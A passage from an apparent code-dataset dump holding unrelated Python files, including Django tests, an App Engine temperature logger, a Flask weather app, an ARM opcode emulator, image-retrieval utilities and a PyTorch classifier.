abs(fprop.q_phase[:,0].sum()) *self.delta_t\n self.gas_production += abs(fprop.q_phase[:,1].sum())*self.delta_t\n\n def update_current_compositional_results(self, M, wells, fprop, simulation_time: float = 0.0):\n\n #total_flux_internal_faces = fprop.total_flux_internal_faces.ravel() #* M.faces.normal[M.faces.internal]\n #total_flux_internal_faces_vector = fprop.total_flux_internal_faces.T * np.abs(M.faces.normal[M.faces.internal])\n if ctes.FR: Nk = fprop.Nk_SP\n else: Nk = fprop.Nk\n self.current_compositional_results = np.array([self.loop, self.vpi, simulation_time,\n self.t, fprop.P, fprop.Sw, fprop.So, fprop.Sg, self.oil_production,\n self.gas_production, fprop.z, M.data['centroid_volumes'], Nk, fprop.xkj],dtype=object)\n self.all_results.append(self.current_compositional_results)\n M.data['saturation'] = fprop.Sw\n M.data['So'] = fprop.So\n M.data['Sg'] = fprop.Sg\n M.data['P'] = fprop.P\n M.data.update_variables_to_mesh()\n M.core.print(file = self.name_all_results + str(self.loop), extension ='.vtk')\n\n def export_current_compositional_results(self):\n np.save(self.name_current_results, self.current_compositional_results)\n\n def export_all_results(self):\n np.save(self.name_all_results + str(self.loop) + '.npy', np.array(self.all_results))\n self.all_results = self.get_empty_current_compositional_results()\n\n def save_infos(self, data_impress, M):\n self.export_current_compositional_results()\n self.export_all_results()\n #data_impress.update_variables_to_mesh()\n #data_impress.export_all_datas_to_npz()\n #M.core.print(file=self.mesh_name, extension='.h5m', config_input=\"input_cards/print_settings.yml\")\n # M.core.print(file = self.mesh_name, extension='.vtk', config_input=\"input_cards/print_settings.yml\")\n","sub_path":"adm_impec-00/run_compositional.py","file_name":"run_compositional.py","file_ext":"py","file_size_in_byte":9122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"582118862","text":"from django.core.urlresolvers import reverse\nfrom django.db import IntegrityError\nfrom django.test import TestCase\nfrom .models import Mineral\n\n\nclass MineralModelTests(TestCase):\n def setUp(self):\n self.mineral_one = Mineral.objects.create(\n name=\"MineratiTesti\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest'\n )\n\n self.mineral_two = Mineral.objects.create(\n name=\"MineratiTestiTwo\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest'\n )\n\n def test_mineral_creation(self):\n all_minerals = Mineral.objects.all()\n self.assertIn(self.mineral_one, all_minerals)\n self.assertIn(self.mineral_two, all_minerals)\n\n with self.assertRaises(IntegrityError):\n # to test unique name unqiuness\n self.mineral_three = Mineral.objects.create(\n name=\"MineratiTesti\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest')\n\n\nclass MineralsViews(TestCase):\n def setUp(self):\n self.mineral_one = Mineral.objects.create(\n name=\"MineratiTesti\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest')\n\n def test_mineral_list_view(self):\n resp = self.client.get(reverse('home'))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral_one, resp.context['minerals'])\n self.assertTemplateUsed(resp, 'index.html')\n self.assertContains(resp, self.mineral_one.name)\n\n def test_mineral_detail_view(self):\n resp = self.client.get(reverse('minerals:detail', kwargs={'pk':self.mineral_one.pk}))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(self.mineral_one, resp.context['mineral'])\n self.assertTemplateUsed(resp, 'minerals/mineral_detail.html')\n self.assertContains(resp, self.mineral_one.name)\n\n\n\n\n\n","sub_path":"minerals/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"19836417","text":"import cgi\nimport os\nimport jinja2\nimport webapp2\nimport uuid\nimport RequestSignature\nimport TemperatureDataModel\nimport datetime\nfrom google.appengine.ext import ndb\n\ntemplate_env = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.getcwd()))\n\nclass Index(webapp2.RequestHandler):\n def get(self):\n self.response.write('hello')\n\nclass ExportLast(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n temperature = TemperatureDataModel.Temperature.temperatures_last( \\\n ndb.Key(\"Device\", device_id))\n \n if temperature == None:\n self.error(400)\n self.response.write('ERROR: wrong device id')\n return\n\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.write(\"{0},{1}\\n\".format(temperature.timestamp.strftime('%Y-%m-%d %H:%M:%S'), \\\n temperature.temperature, \\\n )) \n\nclass ExportCSV(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n start = self.request.get('start')\n end = self.request.get('end')\n hours = self.request.get('hours')\n\n if start != '' and end != '':\n try:\n start = datetime.datetime.strptime(start, '%Y-%m-%d')\n end = datetime.datetime.strptime(end, '%Y-%m-%d')\n except ValueError:\n self.error(400)\n self.response.write('ERROR: wrong dates')\n return\n\n temperature_list = TemperatureDataModel.Temperature.temperatures_by_device_date_filter( \\\n ndb.Key(\"Device\", device_id), \\\n start, \\\n end)\n else:\n temperature_list = TemperatureDataModel.Temperature.temperatures_by_device( \\\n ndb.Key(\"Device\", device_id))\n\n self.response.headers['Content-Type'] = 'text/plain'\n for temperature_data in temperature_list:\n self.response.write(\"{0},{1}\\n\".format(temperature_data.timestamp.strftime('%Y-%m-%d %H:%M:%S'), \\\n temperature_data.temperature, \\\n )) \n\nclass Save(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n # get device secret\n device_list = TemperatureDataModel.Device.query(TemperatureDataModel.Device.device_id == device_id).fetch()\n if len(device_list) != 1:\n self.error(400)\n self.response.write('ERROR: wrong device id')\n return\n\n device = device_list[0]\n\n # get temperature\n temperature_param = self.request.get('t')\n if (temperature_param == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter temperature t')\n return\n\n try:\n temperature = float(temperature_param)\n except ValueError:\n self.error(400)\n self.response.write('ERROR: temperature t is not number')\n return\n\n # get signature\n signature = self.request.get('sig')\n if (signature == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter signature sig')\n return\n\n # check signature\n if (not RequestSignature.RequestSignature.check([device_id, temperature_param], device.secret, signature)):\n self.error(401)\n self.response.write('ERROR: wrong signature')\n return\n\n temperature_data = TemperatureDataModel.Temperature(parent = ndb.Key(\"Device\", device_id),\n temperature = temperature)\n\n temperature_data.put()\n\nclass Chart(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n template = template_env.get_template('chart.html')\n\n temperature_list = TemperatureDataModel.Temperature.temperatures_by_device_since( \\\n ndb.Key(\"Device\", device_id), 24)\n\n chart_data = ''\n for temperature_data in temperature_list:\n chart_data += \"['{0}',{1}],\\n\".format(temperature_data.timestamp.strftime('%Y-%m-%d %H:%M'), \\\n temperature_data.temperature, \\\n )\n\n self.response.out.write(\n template.render({'chart_data' : chart_data}))\n\napplication = webapp2.WSGIApplication([\n ('/', Index),\n ('/save', Save),\n ('/export/csv', ExportCSV),\n ('/export/chart', Chart),\n ('/export/last', ExportLast),\n], debug=True)\n","sub_path":"AppEngine/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"32047981","text":"from __future__ import absolute_import, division, print_function\r\n\r\nimport os\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nfrom AI.FXTM_Predictor_RNN.LSTMVAE import SeqVAE\r\nfrom DataCookers.FXTMdataset import MarketDataGenerator\r\nimport tensorflow.python.keras as keras\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\n\r\nmfile = '.\\SavedModel\\VAE/VAE.h5'\r\nmfile_enc = '.\\SavedModel\\VAE\\VAE_encoder.h5'\r\nmfile_dec = '.\\SavedModel\\VAE\\VAE_decoder.h5'\r\nmfile_arch = '.\\SavedModel\\VAE\\VAE_arch.json'\r\nmfile_enc_arch = '.\\SavedModel\\VAE\\VAE_encoder_arch.json'\r\nmfile_dec_arch = '.\\SavedModel\\VAE\\VAE_decoder_arch.json'\r\nsummarydir = \".\\Summary\\VAE\"\r\n\r\ninput_dim = [16, 3, 1]\r\nencoder_layers = [400]\r\ndecoder_layers = [400, input_dim[1] * input_dim[2]]\r\nbatch_size = 32\r\nepoch = 10\r\nsymbol_list = [\"EURGBP\", \"EURUSD\", \"GBPUSD\"]\r\nlatent_dim = 30\r\n\r\ngen = MarketDataGenerator(0.8, 16, 8, batch_size, symbol_list, datetime(2019, 4, 20), num_samples=90000)\r\nwhole = gen.og_dataset\r\nwholeX, _ = gen.createTestData_nparray(whole, 16, 16)\r\nwholeX = np.expand_dims(wholeX,axis=-1)\r\nprint(wholeX.shape)\r\n\r\nvae = SeqVAE(input_dim, encoder_layers, decoder_layers, latent_dim)\r\nvae.compile(input_dim, keras.optimizers.adam(epsilon=0.0001))\r\n\r\nvae.model.load_weights(mfile)\r\nencoded = vae.encode(wholeX)\r\ndecoded = vae.decode(encoded)\r\npd.DataFrame(encoded).to_csv(\"./Datasets/3FXTM1M_exp_moving10_delta_norm_encoded.csv\")\r\ndecoded = np.reshape(decoded, newshape=[-1, input_dim[1] * input_dim[2]])\r\ntestX = np.reshape(whole, newshape=[-1, input_dim[1] * input_dim[2]])\r\n\r\n\r\nplt.plot(testX)\r\nplt.plot(decoded)\r\nplt.show()\r\n","sub_path":"AI/FXTM_Summarizer/VAEConverter.py","file_name":"VAEConverter.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279754443","text":"from flask import request, redirect, render_template, url_for, Flask, flash\nimport pymysql \nfrom datetime import datetime\nfrom weather import naver_com, accuweather_com, msn_com\nfrom data_analize import analize\n\napp = Flask(__name__)\n\nconn = pymysql.connect(host='127.0.0.1', user='root', password='1234', db='tweather', charset='utf8')\ncurs = conn.cursor()\n\napp.debug = True\n@app.route('/')\ndef index():\n naver_com.naver_weather()\n accuweather_com.accuweather_com()\n #msn_com.msn_com()\n analize.start()\n measure = datetime.date(datetime.today()) # 측정날짜\n curs.execute('select * FROM naver WHERE measurement=%s',measure)\n naver_data = curs.fetchall()\n curs.execute('select * FROM accuweather WHERE measurement=%s',measure)\n accu_data = curs.fetchall()\n \"\"\" curs.execute('select * FROM msn WHERE measurement=%s',measure)\n msn_data = curs.fetchall() \"\"\"\n conn.commit()\n return render_template('index.html', naver_data=naver_data, accu_data=accu_data)\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"562349644","text":"from django.db.models import Count\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom apps.gcd.models import Publisher, Country, Series\nfrom apps.gcd.views import paginate_response\nfrom apps.projects.forms import ImprintsInUseForm\n\n\ndef series_with_both_notes(request):\n series = Series.objects.filter(deleted=False)\\\n .exclude(publication_notes='').exclude(notes='')\n vars = {\n 'heading': 'Series',\n 'search_item': 'With Publication Notes and Notes',\n 'item_name': 'series',\n 'plural_suffix': '',\n }\n\n return paginate_response(request, series,\n 'projects/series_with_both_notes.html', vars)\n\n\ndef imprints_in_use(request):\n \"\"\"\n This project is geared towards clearing out the old imprint field so we can\n either remove it or start over with a new 'imprint' concept with a consistent\n definition. For this we need a list of imprints in use that can be filtered\n and sorted by a few basic attributes.\n \"\"\"\n\n imprints = Publisher.objects.filter(deleted=0, is_master=0)\n\n qargs = {'deleted': 0, 'is_master': 0}\n qorder = ['series_count', 'parent__name', 'name']\n\n vars = {\n 'heading': 'Imprints',\n 'search_item': 'In Use',\n 'item_name': 'imprint',\n 'plural_suffix': 's',\n }\n\n if (request.GET):\n form = ImprintsInUseForm(request.GET)\n form.is_valid()\n if form.is_valid():\n data = form.cleaned_data\n\n # Extra filters\n if data['parent']:\n qargs['parent'] = data['parent']\n if data['parent_country']:\n qargs['parent__country'] = data['parent_country']\n if data['imprint_country']:\n qargs['country'] = data['imprint_country']\n\n # Override order\n if data['order1'] or data['order2'] or data['order3']:\n qorder = []\n if data['order1']:\n qorder.append(data['order1'])\n if data['order2']:\n qorder.append(data['order2'])\n if data['order3']:\n qorder.append(data['order3'])\n else:\n form = ImprintsInUseForm(auto_id=True,\n initial=dict(zip(('order1', 'order2', 'order3'), qorder)))\n\n imprints = imprints.filter(**qargs).order_by(*qorder)\n vars['form'] = form\n\n return paginate_response(request, imprints,\n 'projects/imprints_in_use.html', vars)\n\n","sub_path":"branches/0.4-little-nemo/pydjango/apps/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"339782478","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 9 22:15:47 2020\n\n@author: mofarrag\n\"\"\"\nfrom IPython import get_ipython\nget_ipython().magic(\"reset -f\")\n# import os\n# os.chdir(\"\")\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nimport Hapi.inputs as IN\n\n# BasinF = \"F:/02Case studies/Coello/base_data/GIS/delineation/features/basins.shp\"\nBasinF = \"F:/02Case studies/Coello/base_data/GIS/GIS/BasinExtractParameters.shp\"\nParametersPath = \"F:/01Algorithms/HAPI/Hapi/Parameters\"\nSaveTo = \"F:/02Case studies/Coello/Hapi/Data/00inputs/Basic_inputs\"\n#%%\nBasin = gpd.read_file(BasinF)\n# parameters name with the same order inside the Input module\nind = [\"tt\",\"sfcf\",\"cfmax\",\"cwh\",\"cfr\",\"fc\",\"beta\",\"lp\",\"k0\",\"k1\",\"k2\",\"uzl\",\"perc\",\"maxbas\"]\nPar = pd.DataFrame(index = ind)\n# extract parameters boundaries\nPar['UB'], Par['LB'] = IN.ExtractParametersBoundaries(Basin)\n# extract parameters in a specific scenarion from the 10 scenarios\nPar['1'] = IN.ExtractParameters(Basin,\"10\")\n\"\"\"\nzoom to the place where the catchment exist to check if the basin polygon overlay\nthe right location, if not there is a problem in the coordinate reference system\ntransformation\n\"\"\"\n#%% save the parameters\nPar['UB'].to_csv(SaveTo + \"/UB-Extracted.txt\", header=None)\nPar['LB'].to_csv(SaveTo + \"/LB-Extracted.txt\", header=None)\nPar['1'].to_csv(SaveTo + \"/scenario10.txt\", header=None)\n","sub_path":"Examples/Create Inputs/ExtractParametersBounds.py","file_name":"ExtractParametersBounds.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"596737476","text":"from armulator.armv6.bits_ops import substring, set_substring, lower_chunk\nfrom armulator.armv6.opcodes.opcode import Opcode\n\n\nclass Uadd16(Opcode):\n def __init__(self, instruction, m, d, n):\n super().__init__(instruction)\n self.m = m\n self.d = d\n self.n = n\n\n def execute(self, processor):\n if processor.condition_passed():\n n = processor.registers.get(self.n)\n m = processor.registers.get(self.m)\n sum1 = substring(n, 15, 0) + substring(m, 15, 0)\n sum2 = substring(n, 31, 16) + substring(m, 31, 16)\n d = set_substring(0, 15, 0, lower_chunk(sum1, 16))\n d = set_substring(d, 31, 16, lower_chunk(sum2, 16))\n processor.registers.set(self.d, d)\n ge = 0b11 if sum1 >= 0x10000 else 00\n ge = set_substring(ge, 3, 2, 0b11 if sum2 >= 0x10000 else 00)\n processor.registers.cpsr.ge = ge\n","sub_path":"armulator/armv6/opcodes/abstract_opcodes/uadd16.py","file_name":"uadd16.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465641031","text":"import numpy as np\nfrom numpy import exp, log, pi, sqrt, abs, tanh, arctan\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n\nLambda = 1/2\nx1 = 1\nx2 = 3\n\n@np.vectorize\ndef T(th):\n if th <= 0:\n return Lambda*th\n else:\n return Lambda*(1-exp(-th))\n\ndef S(th):\n # return Lambda*th/sqrt(1+th**2)\n return Lambda*(exp(th)-1)/(exp(th)+1)\n # return Lambda*(th/(1+abs(th)))\n # return Lambda*(2/pi*arctan(pi/2*th))\n\ndef Y(x):\n e = exp(x) - K\n if e > 0:\n return e\n else:\n return 0\n\n# th1 = np.linspace(-0.5, 2)\n# th2 = np.linspace(0.001, 1)\n# th1, th2 = np.meshgrid(th1, th2)\n# z = exp(-th1*x1-T(th2*x2)*x2+th1**2/2)*Lambda/(Lambda-T(th2))\n# ax.plot_surface(th1, th2, z)\n# ax.set_xlabel('th1')\n# ax.set_ylabel('th2')\n\n# th2 = np.linspace(0,3)\nth2 = np.linspace(-20, 5)\ny = [exp(-S(th)*x2 - Lambda*x2)*Lambda/(Lambda-S(th)) for th in th2]\n# y = [-Lambda*th/(1+th)*x2+log(1+th) for th in th2]\n# y = [2*(exp(th)-1)/(exp(th)+1) for th in th2]\n# y = [1-exp(-th) for th in th2]\n# y = [-T(th)*x2+log(Lambda/(Lambda-T(th))) for th in th2]\n# y = [-S(th)*x2+log(Lambda/(Lambda-S(th))) for th in th2]\n# y = [th**2 for th in th2]\nplt.plot(th2, y)\n# y = [exp(2*th) for th in th2]\n# plt.plot(th2, y)\n# y = [exp(th) for th in th2]\n# plt.plot(th2, y)\n\n\nplt.show()\n","sub_path":"convexplot.py","file_name":"convexplot.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"329821796","text":"import cv2\nimport numpy as np\nimport time\nfrom scipy.stats import skew\nfrom scipy.spatial import distance as dist\n\n\ndef LoadImage(path, size=(320, 320)):\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, size)\n return img\n\ndef GetMatchDistance(Features):\n\t'''\n\tGet Matches of features using flann based matcher\n\tInputs:\n\t\tFeatures: List of features of images\n\tOutputs:\n\t\tMatches: Number of matches that passed Lowe's ratio test, multiplied by -1 \n\t'''\n\tMatches = np.zeros((len(Features), len(Features)), np.float32)\n\tfor i in range(len(Features)):\n\t\tfor j in range(i, len(Features)):\n\t\t\tFeature_i, Feature_j = Features[i], Features[j]\n\t\t\tif (Feature_i is None) or (Feature_j is None):\n\t\t\t\tMatches[i, j] = 0\n\t\t\t\tcontinue\n\t\t\tif min(len(Feature_i), len(Feature_j)) < 2:\n\t\t\t\tMatches[i, j] = 0\n\t\t\t\tcontinue\n\t\t\tFLANN_INDEX_KDTREE = 1\n\t\t\tindex_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n\t\t\tsearch_params = dict(checks=50)\n\t\t\tflann = cv2.FlannBasedMatcher(index_params, search_params)\n\t\t\tmatches = flann.knnMatch(Feature_i, Feature_j, k=2)\n\t\t\t# Apply ratio test\n\t\t\tratio = 0.75\n\t\t\tgood_matches = [m1 for m1, m2 in matches if m1.distance < ratio * m2.distance]\n\t\t\tif len(good_matches) == 0:\n\t\t\t\tMatches[i, j] = 0\n\t\t\telse:\n\t\t\t\tMatches[i, j] = len(good_matches)\n\tMatches = -(Matches + Matches.T)\n\treturn Matches\n\ndef GetMAP(Features, Id2Label, Metrics, Weights=None):\n\t'''\n\tCalculate overall MAP with leave 1 out fashion\n\tInputs:\n\t\tFeatures: List of features of images\n\t\tId2Label: A dictionary that maps id to label\n\t\tMetrics: List of metrics for calculating distance\n\t\tWeights: Weight for each feature\n\tOutputs:\n\t\tMAP: Overall MAP\n\t\tCMAP: Category MAP\n\t'''\n\tSumAP = 0.0\n\tCategoryAP = {}\n\tNumofFeatures = len(Features)\n\tNumofImages = Features[0].shape[0]\n\n\t# Get Distance\n\tDistances = np.zeros((NumofFeatures, NumofImages, NumofImages), np.float32)\n\tfor n in range(NumofFeatures):\n\t\tCurFeature = Features[n]\n\t\tif Metrics[n] == 'match':\n\t\t\tDistance_ = GetMatchDistance(CurFeature)\n\t\t\tDistances[n] = Distance_\n\t\telif len(CurFeature.shape) == 2:\n\t\t\tDistance_ = dist.squareform(dist.pdist(CurFeature, metric=Metrics[n]))\n\t\t\tDistances[n] += Distance_\n\t\telif len(CurFeature.shape) == 3:\n\t\t\tfor i in range(CurFeature.shape[1]):\n\t\t\t\tDistance_ = dist.squareform(dist.pdist(CurFeature[:,i,:], metric=Metrics[n]))\n\t\t\t\tDistances[n] += Distance_\n\n\t# Normalize each feature distance\n\tfor i in range(NumofFeatures):\n\t\tD = Distances[i]\n\t\tMean = np.mean(D, axis=1)\n\t\tVar = np.var(D, axis=1)\n\t\tDistances[i] = ((D.T - Mean) / Var).T\n\n\t# Apply weight to each distance\n\tif Weights is None:\n\t\tDistance = np.sum(Distances, axis=0)\n\telse:\n\t\tDistance = np.zeros((NumofImages, NumofImages), np.float32)\n\t\tfor i in range(NumofFeatures):\n\t\t\tDistance += Distances[i] * Weights[i]\n\t\n\t# Calculate MAP\n\tfor i in range(NumofImages):\n\t\tTargetLabel = Id2Label[i]\n\t\tRank = np.argsort(Distance[i])\n\t\tTP = 0.0\n\t\tSumPrecision = 0.0\n\t\tfor j in range(1, NumofImages):\n\t\t\tId = Rank[j]\n\t\t\tif Id2Label[Id] == TargetLabel:\n\t\t\t\tTP += 1.0\n\t\t\t\tSumPrecision += TP / j\n\t\tAP = SumPrecision / TP\n\t\tSumAP += AP\n\t\tif TargetLabel in CategoryAP:\n\t\t\tCategoryAP[TargetLabel].append(AP)\n\t\telse:\n\t\t\tCategoryAP[TargetLabel] = [AP]\n\tMAP = SumAP / NumofImages\n\tCMAP = {}\n\tfor Label in CategoryAP:\n\t\tCMAP[Label] = sum(CategoryAP[Label]) / len(CategoryAP[Label])\n\treturn MAP, CMAP\n\ndef GetFeatures(FeatureDatabase, FeatureNames):\n\t'''\n\tGet features from FeatureDatabase\n\tInputs:\n\t\tFeatureDatabase: The feature database\n\t\tFeatureNames: List of feature names\n\tOutputs:\n\t\tFeatures: The desired features\n\t\tId2Label: A dictionary that maps id to label\n\t\tId2Image: A dictionary that maps id to image\n\t'''\n\tId2Label = {}\n\tId2Image = {}\n\tFeatures = [[] for _ in range(len(FeatureNames))]\n\tId = 0\n\tfor Label in FeatureDatabase:\n\t\tfor Image in FeatureDatabase[Label]:\n\t\t\tfor i in range(len(FeatureNames)):\n\t\t\t\tFeatures[i].append(Image[FeatureNames[i]])\n\t\t\tId2Label[Id] = Label\n\t\t\tId2Image[Id] = Image['RGB']\n\t\t\tId += 1\n\tFeatures = [np.array(x) for x in Features]\n\treturn Features, Id2Label, Id2Image\n\ndef RunExperiment(FeatureDatabase, FeatureList, MetricList, WeightList=None):\n\t'''\n\tRun Experiment and print MAP, best 2 category & worst 2 category\n\tInputs:\n\t\tFeatureDatabase: The feature database\n\t\tFeatureList: List of feature names (key for FeatureDatabase)\n\t\tMetricList: List of distance metrics for each feature\n\t\tWeightList: Weight for each feature, if None, simply sum up all metrics\n\tOutputs:\n\t\tNone\n\t'''\n\t# Check if the arguments are valid\n\tif len(FeatureList) != len(MetricList):\n\t\tprint(\"ERROR: FeatureList is not the same length of MetricList\")\n\t\treturn\n\tif WeightList is not None:\n\t\tif len(FeatureList) != len(WeightList):\n\t\t\tprint(\"ERROR: FeatureList is not the same length of WeightList\")\n\t\t\treturn\n\n\tStartTime = time.time()\n\tFeatures, Id2Label, Id2Image = GetFeatures(FeatureDatabase, FeatureList)\n\tMAP, CMAP = GetMAP(Features, Id2Label, Metrics=MetricList, Weights=WeightList)\n\tTime = time.time() - StartTime\n\tprint(\"MAP: %8f - Time: %8fs\" % (MAP, Time))\n\tLabels = []\n\tCMAPs = []\n\tfor Label in CMAP:\n\t Labels.append(Label)\n\t CMAPs.append(CMAP[Label])\n\tLabels = np.array(Labels)\n\tCMAPs = np.array(CMAPs)\n\tRank = np.argsort(CMAPs)\n\tprint(\"Best: %s(%8f)\" % (Labels[Rank[-1]], CMAPs[Rank[-1]]), end=\"\")\n\tprint(\", %s(%8f)\" % (Labels[Rank[-2]], CMAPs[Rank[-2]]))\n\tprint(\"Worst: %s(%8f)\" % (Labels[Rank[0]], CMAPs[Rank[0]]), end=\"\")\n\tprint(\", %s(%8f)\" % (Labels[Rank[1]], CMAPs[Rank[1]]))\n\treturn ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"76419694","text":"# 建议不要用 IDLE 运行\nimport pyautogui\nprint('按 Ctrl+C 退出程序! ')\ntry:\n while True:\n #获取并打印鼠标坐标位置\n x,y = pyautogui.position()\n positionStr = 'X:' + str(x).rjust(4) + ' Y:' + str(y).rjust(4)\n # 获取当前鼠标坐标位置的 RGB 值\n pixelColor = pyautogui.screenshot().getpixel((x, y))\n positionStr += '\\tRGB: (' + str(pixelColor[0]).rjust(3) + ', ' + str(pixelColor[1]).rjust(3) + ', ' + str(pixelColor[2]).rjust(3) + ')'\n\n print(positionStr, end='\\r')\n \nexcept KeyboardInterrupt:\n print('\\n结束!')","sub_path":"ComputerAndNetwork/Languages/Python/第三方模块/GUI自动化/pyautogui/获取鼠标位置的坐标及RGB值.py","file_name":"获取鼠标位置的坐标及RGB值.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"314744605","text":"#!/usr/bin/env python\n# This software may be used and distributed according to the terms of the\n# GNU General Public License version 2 or any later version.\n\nimport os\n\nOUR_DIR = os.path.normpath(os.path.dirname(__file__))\nexecfile(os.path.join(OUR_DIR, '..', '..', '..', 'bootstrap.py'))\n\napplication = make_application(OUR_DIR)\n","sub_path":"hgwsgi/releases/l10n/mozilla-aurora/hgweb.wsgi","file_name":"hgweb.wsgi","file_ext":"wsgi","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"290742650","text":"# coding: utf-8\n\nimport torch.nn as nn\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(3,3,3)\n self.maxpool1 = nn.MaxPool2d(kernel_size= 2)\n self.relu1 = nn.ReLU(inplace= True)\n \n self.conv2 = nn.Conv2d(3,6,3)\n self.maxpool2 = nn.MaxPool2d(kernel_size= 2)\n self.relu2 = nn.ReLU(inplace= True)\n \n self.fc1_1 = nn.Linear(6 * 30 * 30, 150)\n self.relu3_1 = nn.ReLU(inplace= True)\n self.fc1_2 = nn.Linear(6 * 30 * 30, 150)\n self.relu3_2 = nn.ReLU(inplace= True)\n \n self.drop_1 = nn.Dropout(p = 0.5)\n self.drop_2 = nn.Dropout(p = 0.5)\n \n self.fc2_1 = nn.Linear(150,2)\n self.fc2_2 = nn.Linear(150,3)\n \n self.softmax_1 = nn.Softmax(dim = 1)\n self.softmax_2 = nn.Softmax(dim = 1)\n \n def forward(self, x):\n x = self.conv1(x)\n x = self.maxpool1(x)\n x = self.relu1(x)\n \n x = self.conv2(x)\n x = self.maxpool2(x)\n x = self.relu2(x)\n \n x = x.view(-1, 6 * 30 * 30)\n \n x_class = self.fc1_1(x)\n x_class = self.relu3_1(x_class)\n x_class = self.drop_1(x_class)\n \n x_class = self.fc2_1(x_class)\n x_class = self.softmax_1(x_class)\n \n x_species = self.fc1_2(x)\n x_species = self.relu3_2(x_species)\n x_species = self.drop_2(x_species)\n \n x_species = self.fc2_2(x_species)\n x_species = self.softmax_2(x_species)\n return x_class, x_species\n\n","sub_path":"project1_classification/stage_3/Network_Classes.py","file_name":"Network_Classes.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302488424","text":"from flask_restful import Resource\nfrom flask import jsonify, request\nimport uuid\n\nVEGETABLES = [\n {\n 'id': uuid.uuid4().hex,\n 'name': 'carrot',\n 'color': 'orange'\n },\n {\n 'id': uuid.uuid4().hex,\n 'name': 'tomato',\n 'color': 'red'\n },\n {\n 'id': uuid.uuid4().hex,\n 'name': 'cucumber',\n 'color': 'green'\n },\n {\n 'id': uuid.uuid4().hex,\n 'name': 'cauliflower',\n 'color': 'various'\n },\n]\n\n\nclass Vegetables(Resource):\n @staticmethod\n def get():\n return jsonify({\n 'status': 'success',\n 'vegetables': VEGETABLES\n })\n\n @staticmethod\n def post():\n response_object = {'status': 'success'}\n post_data = request.get_json()\n VEGETABLES.append({\n 'id': uuid.uuid4().hex,\n 'name': post_data.get('name'),\n 'color': post_data.get('color')\n })\n response_object['message'] = 'Vegatable added!'\n return jsonify(response_object)\n\n @staticmethod\n def remove_vegetable(vegetable_id):\n for vegetable in VEGETABLES:\n if vegetable['id'] == vegetable_id:\n VEGETABLES.remove(vegetable)\n return True\n return False\n\n @staticmethod\n def put(vegetable_id):\n response_object 